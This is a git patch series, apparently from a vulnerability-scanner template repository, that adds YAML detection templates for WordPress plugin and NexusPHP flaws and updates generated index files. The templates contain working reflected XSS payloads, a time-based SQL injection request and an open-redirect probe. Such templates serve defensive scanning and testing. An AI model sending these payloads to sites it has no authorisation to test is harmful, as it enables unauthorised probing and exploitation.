https://wpscan.com/vulnerability/a8dca528-fb70-44f3-8149-21385039179d + - https://nvd.nist.gov/vuln/detail/CVE-2022-4301 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-4301 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2022,xss,sunshine,wordpress,wp-plugin,wpscan,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<script>alert(document.domain)</script>' + - 'Registration Form' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/cves/2022/CVE-2022-4306.yaml b/cves/2022/CVE-2022-4306.yaml new file mode 100644 index 0000000000..23cc7f14c9 --- /dev/null +++ b/cves/2022/CVE-2022-4306.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-4306 + +info: + name: Panda Pods Repeater Field < 1.5.4 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + The plugin does not sanitize and escapes a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a user having at least Contributor permission. + remediation: Fixed in version 1.5.4 + reference: + - https://wpscan.com/vulnerability/18d7f9af-7267-4723-9d6f-05b895c94dbe + - https://nvd.nist.gov/vuln/detail/CVE-2022-4306 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-4306 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2022,xss,panda,pods,repeater,wordpress,wp-plugin,wpscan,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php?itemid=1&podid=1);%20alert(document.domain);/*x&iframe_id=panda-repeater-add-new&success=1 HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "alert(document.domain)")' + - 'contains(body_2, "panda-repeater-add-new")' + condition: and diff --git a/cves/2022/CVE-2022-45805.yaml b/cves/2022/CVE-2022-45805.yaml new file mode 100644 index 0000000000..8fb7acaa86 --- /dev/null +++ b/cves/2022/CVE-2022-45805.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-45805 + +info: + name: WordPress Paytm Payment Gateway Plugin <= 2.7.3 - SQL Injection + author: theamanrawat + severity: high + description: | + SQL Injection vulnerability in WordPress Paytm Payment Gateway Plugin. This could allow a malicious actor to directly interact with your database, including but not limited to stealing information and creating new administrator accounts. This vulnerability has been fixed in version 2.7.7. + remediation: Update to version 2.7.7, or a newer patched version. + reference: + - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-3-auth-sql-injection-sqli-vulnerability + - https://wordpress.org/plugins/paytm-payments/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-45805 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.2 + cve-id: CVE-2022-45805 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,paytm-payments,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + @timeout: 15s + GET /wp-admin/post.php?post=1+AND+(SELECT+6205+FROM+(SELECT(SLEEP(6)))RtRs)&action=edit HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'duration_2>=6' + - 'status_code_2 == 200' + - 'contains(body_2, "toplevel_page_paytm")' + condition: and diff --git a/cves/2022/CVE-2022-46888.yaml b/cves/2022/CVE-2022-46888.yaml new file mode 100644 index 0000000000..8c62092fbe --- /dev/null +++ b/cves/2022/CVE-2022-46888.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-46888 + +info: + name: NexusPHP - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + NexusPHPbefore 1.7.33 allow remote attackers to inject arbitrary web script or HTML via the secret parameter in /login.php. + reference: + - https://www.surecloud.com/resources/blog/nexusphp-surecloud-security-review-identifies-authenticated-unauthenticated-vulnerabilities + - https://nvd.nist.gov/vuln/detail/CVE-2022-46888 + metadata: + verified: true + shodan-query: http.favicon.hash:-582931176 + tags: cve,cve2022,nexus,php,nexusphp,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/login.php?secret="><script>alert(document.domain)</script>' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'value=""><script>alert(document.domain)</script>">' + - 'NexusPHP' + condition: and + case-insensitive: true + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2022/CVE-2022-4897.yaml b/cves/2022/CVE-2022-4897.yaml new file mode 100644 index 0000000000..f1b09754de --- /dev/null +++ b/cves/2022/CVE-2022-4897.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-4897 + +info: + name: BackupBuddy < 8.8.3 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + The BackupBuddy WordPress plugin before 8.8.3 does not sanitise and escape some parameters before outputting them back in various places, leading to Reflected Cross-Site Scripting. + remediation: Fixed in version 8.8.3 + reference: + - https://wpscan.com/vulnerability/7b0eeafe-b9bc-43b2-8487-a23d3960f73f + - https://nvd.nist.gov/vuln/detail/CVE-2022-4897 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-4897 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2022,xss,backupbuddy,wordpress,wp-plugin,wpscan,wp,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.11 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "onload=alert(document.domain)")' + - 'contains(body_2, "BackupBudddy iFrame")' + condition: and diff --git a/cves/2023/CVE-2023-23492.yaml b/cves/2023/CVE-2023-23492.yaml new file mode 100644 index 0000000000..fd89aeafcc --- /dev/null +++ b/cves/2023/CVE-2023-23492.yaml @@ -0,0 +1,40 @@ +id: CVE-2023-23492 + +info: + name: Login with Phone Number - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Login with Phone Number, versions < 1.4.2, is affected by an reflected XSS vulnerability in the login-with-phonenumber.php' file in the 'lwp_forgot_password()' function. + reference: + - https://wordpress.org/plugins/login-with-phone-number/ + - https://www.tenable.com/security/research/tra-2023-3 + - https://nvd.nist.gov/vuln/detail/CVE-2023-23492 + classification: + cve-id: CVE-2023-23492 + metadata: + verified: "true" + tags: cve,cve2023,login-with-phonenumber,wordpress,wp,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)>" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<svg onload=alert(document.domain)>' + - 'message":"Update password' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/3d-print-lite-xss.yaml b/vulnerabilities/wordpress/3d-print-lite-xss.yaml new file mode 100644 index 0000000000..8bf6c1c917 --- /dev/null +++ b/vulnerabilities/wordpress/3d-print-lite-xss.yaml @@ -0,0 +1,38 @@ +id: 3d-print-lite-xss + +info: + name: 3D Print Lite < 1.9.1.6 - Reflected Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The plugin does not sanitise and escape some user input before outputting it back in attributes, leading to Reflected Cross-Site Scripting issues + remediation: Update to plugin version 1.9.1.6 or latest + reference: + - https://wpscan.com/vulnerability/5909e225-5756-472e-a2fc-3ac52c7fb909 + - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-3dprint-lite-cross-site-scripting-1-9-1-5/ + metadata: + verified: "true" + tags: xss,wordpress,wp-plugin,wp,3dprint,lite,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=p3dlite_materials&material_text="><script>alert(document.domain)</script> HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "<script>alert(document.domain)</script>")' + - 'contains(body_2, "3dprint-lite_page_p3dlite_materials")' + condition: and diff --git a/vulnerabilities/wordpress/wp-touch-redirect.yaml b/vulnerabilities/wordpress/wp-touch-redirect.yaml new file mode 100644 index 0000000000..5078a00b94 --- /dev/null +++ b/vulnerabilities/wordpress/wp-touch-redirect.yaml @@ -0,0 +1,25 @@ +id: wp-touch-redirect + +info: + name: WordPress WPtouch 3.7.5 - Open Redirect + author: r3Y3r53 + severity: medium + description: | + WordPress WPtouch 3.7.5 is affected by an Open Redirect issue. + reference: + - https://packetstormsecurity.com/files/170568/WordPress-WPtouch-3.7.5-Open-Redirection.html + metadata: + verified: "true" + google-query: "inurl:/wp-content/plugins/wptouch" + tags: wptouch,unauth,redirect,wordpress,wp-plugin,wp + +requests: + - method: GET + path: + - "{{BaseURL}}/?wptouch_switch=desktop&redirect=http://interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' From 573644f6ac1300dc2ad295dacbce863199141ee6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sun, 5 Mar 2023 19:16:52 +0530 Subject: [PATCH 79/84] Delete github-recovery-code.yaml --- file/keys/github-recovery-code.yaml | 16 ---------------- 1 file changed, 16 deletions(-) delete mode 100644 file/keys/github-recovery-code.yaml diff --git a/file/keys/github-recovery-code.yaml b/file/keys/github-recovery-code.yaml deleted file mode 100644 index 8643d40105..0000000000 --- a/file/keys/github-recovery-code.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: github-recovery-code - -info: - name: Github Recovery Code - author: geeknik - severity: high - tags: github,recovery,token,file - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - '^[a-z]{1,4}[0-9]{1,4}\-[a-z0-9]{5}' From f84410e00d94305d424d883b280e7f7acf6a8b6c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sun, 5 Mar 2023 19:22:34 +0530 Subject: [PATCH 81/84] fix trailling space --- cves/2015/CVE-2015-2755.yaml | 4 ++-- cves/2021/CVE-2021-24155.yaml | 2 +- cves/2022/CVE-2022-0760.yaml | 2 +- cves/2022/CVE-2022-4306.yaml | 2 +- 4 files changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/2015/CVE-2015-2755.yaml b/cves/2015/CVE-2015-2755.yaml index edf698e6a2..86e83ffbed 100644 --- a/cves/2015/CVE-2015-2755.yaml +++ b/cves/2015/CVE-2015-2755.yaml @@ -1,7 +1,7 @@ id: CVE-2015-2755 info: - name: AB Google Map Travel (AB-MAP) Wordpress Plugin <=3.4 - Stored XSS + name: AB Google Map Travel (AB-MAP) Wordpress Plugin <=3.4 - Stored XSS author: r3Y3r53 severity: medium description: | @@ -27,7 +27,7 @@ requests: POST /wp-admin/admin.php?page=ab_map_options HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - + lat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings cookie-reuse: true diff --git a/cves/2021/CVE-2021-24155.yaml b/cves/2021/CVE-2021-24155.yaml index 2af733a77d..75470165b5 100644 --- a/cves/2021/CVE-2021-24155.yaml +++ b/cves/2021/CVE-2021-24155.yaml @@ -43,7 +43,7 @@ requests: Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php" Content-Type: application/x-php - <?php + <?php echo "CVE-2021-24155"; diff --git a/cves/2022/CVE-2022-0760.yaml b/cves/2022/CVE-2022-0760.yaml index 30d87c18e8..9369addbf8 100644 --- a/cves/2022/CVE-2022-0760.yaml +++ b/cves/2022/CVE-2022-0760.yaml @@ -35,5 +35,5 @@ requests: - 'duration>=7' - 'status_code == 200 || status_code == 500' - 'contains(content_type, "text/html")' - - 'contains(body, "vote_status") || contains(body, "critical error")' + - 'contains(body, "vote_status") || contains(body, "critical error")' condition: and diff --git a/cves/2022/CVE-2022-4306.yaml b/cves/2022/CVE-2022-4306.yaml index 23cc7f14c9..519f1153f5 100644 --- a/cves/2022/CVE-2022-4306.yaml +++ b/cves/2022/CVE-2022-4306.yaml @@ -25,7 +25,7 @@ requests: POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - + log={{username}}&pwd={{password}}&wp-submit=Log+In - | From d8822513c90ecac8fbd057ee7050541e00a070ef Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 5 Mar 2023 14:02:31 +0000 Subject: [PATCH 82/84] Auto Generated New Template Addition List [Sun Mar 5 14:02:31 UTC 2023] :robot: --- .new-additions | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) diff --git a/.new-additions b/.new-additions index 45e1a591ac..72d20e53e3 100644 --- a/.new-additions +++ b/.new-additions @@ -1,7 +1,38 @@ +cves/2015/CVE-2015-2755.yaml +cves/2015/CVE-2015-4062.yaml +cves/2015/CVE-2015-4063.yaml +cves/2015/CVE-2015-9312.yaml +cves/2017/CVE-2017-14622.yaml +cves/2018/CVE-2018-16159.yaml +cves/2021/CVE-2021-24145.yaml +cves/2021/CVE-2021-24155.yaml +cves/2021/CVE-2021-24169.yaml +cves/2021/CVE-2021-24287.yaml +cves/2021/CVE-2021-24347.yaml +cves/2021/CVE-2021-24554.yaml +cves/2021/CVE-2021-24875.yaml +cves/2021/CVE-2021-24931.yaml +cves/2021/CVE-2021-25067.yaml +cves/2021/CVE-2021-27520.yaml +cves/2022/CVE-2022-0693.yaml +cves/2022/CVE-2022-0760.yaml +cves/2022/CVE-2022-0949.yaml +cves/2022/CVE-2022-1013.yaml +cves/2022/CVE-2022-3934.yaml +cves/2022/CVE-2022-4060.yaml +cves/2022/CVE-2022-4063.yaml +cves/2022/CVE-2022-4301.yaml +cves/2022/CVE-2022-4306.yaml +cves/2022/CVE-2022-45805.yaml +cves/2022/CVE-2022-46888.yaml cves/2022/CVE-2022-48165.yaml +cves/2022/CVE-2022-4897.yaml +cves/2023/CVE-2023-23492.yaml exposed-panels/axway-securetransport-panel.yaml exposed-panels/axway-securetransport-webclient.yaml exposed-panels/gnu-mailman.yaml exposed-panels/kubeview-dashboard.yaml technologies/nimplant-c2.yaml technologies/wordpress/plugins/wpvivid-backuprestore.yaml +vulnerabilities/wordpress/3d-print-lite-xss.yaml +vulnerabilities/wordpress/wp-touch-redirect.yaml From 95bb5205c8a8dcb4ab6b4ef819fcbe24f5c2add3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 5 Mar 2023 14:02:40 +0000 Subject: [PATCH 83/84] Auto Generated cves.json [Sun Mar 5 14:02:40 UTC 2023] :robot: --- cves.json | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) diff --git a/cves.json b/cves.json index 060efe8bd2..2339cd2420 100644 --- a/cves.json +++ b/cves.json @@ -253,6 +253,7 @@ {"ID":"CVE-2015-2068","Info":{"Name":"Magento Server Mass Importer - Cross-Site Scripting","Severity":"medium","Description":"Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-2068.yaml"} {"ID":"CVE-2015-2080","Info":{"Name":"Eclipse Jetty \u003c9.2.9.v20150224 - Sensitive Information Leakage","Severity":"high","Description":"Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-2080.yaml"} {"ID":"CVE-2015-2166","Info":{"Name":"Ericsson Drutt MSDP - Local File Inclusion","Severity":"high","Description":"Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-2166.yaml"} +{"ID":"CVE-2015-2755","Info":{"Name":"AB Google Map Travel (AB-MAP) Wordpress Plugin \u003c=3.4 - Stored XSS","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in the AB Google Map Travel (AB-MAP) plugin before 4.0 for WordPress allow remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameter in the ab_map_options page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-2755.yaml"} {"ID":"CVE-2015-2807","Info":{"Name":"Navis DocumentCloud \u003c0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-2807.yaml"} {"ID":"CVE-2015-2996","Info":{"Name":"SysAid Help Desk \u003c15.2 - Local File Disclosure","Severity":"high","Description":"Multiple directory traversal vulnerabilities in SysAid Help Desk before 15.2 allow remote attackers to (1) read arbitrary files via a .. (dot dot) in the fileName parameter to getGfiUpgradeFile or (2) cause a denial of service (CPU and memory consumption) via a .. (dot dot) in the fileName parameter to calculateRdsFileChecksum.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-2996.yaml"} {"ID":"CVE-2015-3035","Info":{"Name":"TP-LINK - Local File Inclusion","Severity":"high","Description":"TP-LINK is susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310. Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2015/CVE-2015-3035.yaml"} @@ -262,6 +263,8 @@ {"ID":"CVE-2015-3648","Info":{"Name":"ResourceSpace - Local File inclusion","Severity":"high","Description":"ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-3648.yaml"} {"ID":"CVE-2015-3897","Info":{"Name":"Bonita BPM Portal \u003c6.5.3 - Local File Inclusion","Severity":"high","Description":"Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-3897.yaml"} {"ID":"CVE-2015-4050","Info":{"Name":"Symfony - Authentication Bypass","Severity":"high","Description":"Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-4050.yaml"} +{"ID":"CVE-2015-4062","Info":{"Name":"NewStatPress 0.9.8 - SQL Injection","Severity":"critical","Description":"The NewStatPress WordPress plugin was affected by SQL Injection security vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2015/CVE-2015-4062.yaml"} +{"ID":"CVE-2015-4063","Info":{"Name":"NewStatPress 0.9.8 - Cross Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in includes/nsp_search.php in the NewStatPress plugin before 0.9.9 for WordPress allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-4063.yaml"} {"ID":"CVE-2015-4074","Info":{"Name":"Joomla! Helpdesk Pro plugin \u003c1.4.0 - Local File Inclusion","Severity":"high","Description":"Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-4074.yaml"} {"ID":"CVE-2015-4127","Info":{"Name":"WordPress Church Admin \u003c0.810 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-4127.yaml"} {"ID":"CVE-2015-4414","Info":{"Name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","Severity":"high","Description":"WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-4414.yaml"} @@ -287,6 +290,7 @@ {"ID":"CVE-2015-8349","Info":{"Name":"SourceBans \u003c2.0 - Cross-Site Scripting","Severity":"medium","Description":"SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2015/CVE-2015-8349.yaml"} {"ID":"CVE-2015-8399","Info":{"Name":"Atlassian Confluence \u003c5.8.17 - Information Disclosure","Severity":"medium","Description":"Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.","Classification":{"CVSSScore":"4.3"}},"file_path":"cves/2015/CVE-2015-8399.yaml"} {"ID":"CVE-2015-8813","Info":{"Name":"Umbraco \u003c7.4.0- Server-Side Request Forgery","Severity":"high","Description":"Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.","Classification":{"CVSSScore":"8.2"}},"file_path":"cves/2015/CVE-2015-8813.yaml"} +{"ID":"CVE-2015-9312","Info":{"Name":"NewStatPress \u003c= 1.0.4 - Cross Site Scripting","Severity":"medium","Description":"The NewStatPress plugin utilizes on lines 28 and 31 of the file ‘includes/nsp_search.php’ several variables from the $_GET scope, without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to trigger a Reflected XSS attack.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-9312.yaml"} {"ID":"CVE-2015-9414","Info":{"Name":"WordPress Symposium \u003c=15.8.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Symposium through 15.8.1 contains a reflected cross-site scripting vulnerability via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter which allows an attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2015/CVE-2015-9414.yaml"} {"ID":"CVE-2015-9480","Info":{"Name":"WordPress RobotCPA 5 - Directory Traversal","Severity":"high","Description":"The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-9480.yaml"} {"ID":"CVE-2016-0957","Info":{"Name":"Adobe AEM Dispatcher \u003c4.15 - Rules Bypass","Severity":"high","Description":"Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2016/CVE-2016-0957.yaml"} @@ -369,6 +373,7 @@ {"ID":"CVE-2017-14186","Info":{"Name":"FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting","Severity":"medium","Description":"FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not sanitized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2017/CVE-2017-14186.yaml"} {"ID":"CVE-2017-14535","Info":{"Name":"Trixbox - 2.8.0.4 OS Command Injection","Severity":"high","Description":"Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2017/CVE-2017-14535.yaml"} {"ID":"CVE-2017-14537","Info":{"Name":"Trixbox 2.8.0 - Path Traversal","Severity":"medium","Description":"Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2017/CVE-2017-14537.yaml"} +{"ID":"CVE-2017-14622","Info":{"Name":"2kb Amazon Affiliates Store plugin \u003c 2.1.1 - Reflected Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting (XSS) vulnerabilities in the 2kb Amazon Affiliates Store plugin before 2.1.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter or (2) kbAction parameter in the kbAmz page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2017/CVE-2017-14622.yaml"} {"ID":"CVE-2017-14651","Info":{"Name":"WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting","Severity":"medium","Description":"WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2017/CVE-2017-14651.yaml"} {"ID":"CVE-2017-14849","Info":{"Name":"Node.js \u003c8.6.0 - Directory Traversal","Severity":"high","Description":"Node.js before 8.6.0 allows remote attackers to access unintended files because a change to \"..\" handling is incompatible with the pathname validation used by unspecified community modules.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-14849.yaml"} {"ID":"CVE-2017-15287","Info":{"Name":"Dreambox WebControl 2.0.0 - Cross-Site Scripting","Severity":"medium","Description":"Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the \"Name des Bouquets\" field, or the file parameter to the /file URI.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-15287.yaml"} @@ -472,6 +477,7 @@ {"ID":"CVE-2018-16059","Info":{"Name":"WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion","Severity":"medium","Description":"WirelessHART Fieldgate SWG70 3.0 is vulnerable to local file inclusion via the fcgi-bin/wgsetcgi filename parameter.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2018/CVE-2018-16059.yaml"} {"ID":"CVE-2018-16133","Info":{"Name":"Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion","Severity":"medium","Description":"Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2018/CVE-2018-16133.yaml"} {"ID":"CVE-2018-16139","Info":{"Name":"BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting","Severity":"medium","Description":"BIBLIOsoft BIBLIOpac 2008 contains a cross-site scripting vulnerability via the db or action parameter to bin/wxis.exe/bibliopac/, which allows a remote attacker to inject arbitrary web script or HTML.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-16139.yaml"} +{"ID":"CVE-2018-16159","Info":{"Name":"Gift Voucher \u003c 4.1.8 - Unauthenticated Blind SQL Injection","Severity":"critical","Description":"The Gift Vouchers plugin through 2.0.1 for WordPress allows SQL Injection via the 